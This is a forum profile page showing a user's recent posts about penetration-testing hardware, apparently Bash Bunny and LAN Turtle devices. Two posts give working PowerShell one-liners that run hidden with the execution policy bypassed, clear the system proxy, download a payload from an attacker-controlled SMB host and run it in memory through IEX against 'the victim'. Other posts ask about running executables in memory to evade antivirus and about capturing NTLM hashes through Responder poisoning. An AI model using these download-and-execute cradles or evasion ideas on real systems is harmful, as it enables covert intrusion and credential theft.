Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

About cyb3rwr3ck

  • Rank

Recent Profile Visitors

501 profile views
  1. And this is it (works, according to a quick test): powershell -exec Bypass -noP "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {$p = [System.Net.WebProxy]::GetDefaultProxy(); $p.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; [System.Net.GlobalProxySelection]::Select = [System.Net.GlobalProxySelection]::GetEmptyWebProxy(); $w=(New-Object System.Net.WebClient).DownloadString('\\<BB_IN_HERE>\p.txt'); [System.Net.GlobalProxySelection]::Select = $p; IEX $w;exit}}" Store default proxy + Creds to $p Clear pr
  2. Alright, had some time to check this out during the weekend. Invoke-Webrequest: The -NoProxy option seems to be part of PS >= v. 6, so its not reliably to be found on the victim in any way. This is how it should look like if we want to first check a SMB share for connectivity and then download/execute a payload from it without using the system wide proxy in case of PS >= v6: powershell -exec Bypass -noP -WindowsStyle Hidden "while ($true) {If ((New-Object net.sockets.tcpclient('<HOST_IN_HERE>','445')).Connected) {IEX (Invoke-Webrequest -UseBasicParsing -Uri '\\<HOS
  3. The thing is that the bunny presents a Network to the Host during this kind of "bring your own network attack". So the proxy is utilized as long as there is no "direct" exception for exactly this bunny network configuration. This will create a connect request to the explicit proxy which dies... The only thing that should fix this behavior is enforcing this kind of direct request which - in an enterprise setup - is usually done by pac files. I have no idea how to do it temporarily using powershell so this is the goal to achieve.
  4. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumv
  5. Anybody who has already tried to convert the .exe to a string and run it in-memory via powershell to get rid of the AV problem?
  6. I can confirm that ufw - which is part of Linux Mint 18 - also prevents me from running wp6.sh without locking down my connections. A "service ufw stop" before running the script or in "connectsaved" function the fixes the problem. @PaulFinch: Would you mind to add your code to github or to this post? This might help others with the same problem without researching it first...
  7. Hmmm, I am facing the same issue. Factory reset of the turtle, opkg update, then configuration of the quickcreds module using the turtle shell. The log folders I see in the /etc/turtle/Responder/logs folder are linked to /root/loot as it should be, but there is nothing in it. On the wire I can see that the poisoning is woking and windows is using the faked proxy which is asking for NTML authentication. Anyway no hashes are dumped to the turtle. I have tested the setup with a domain joined win 7 pro and a stand alone win 10 home.
  • Create New...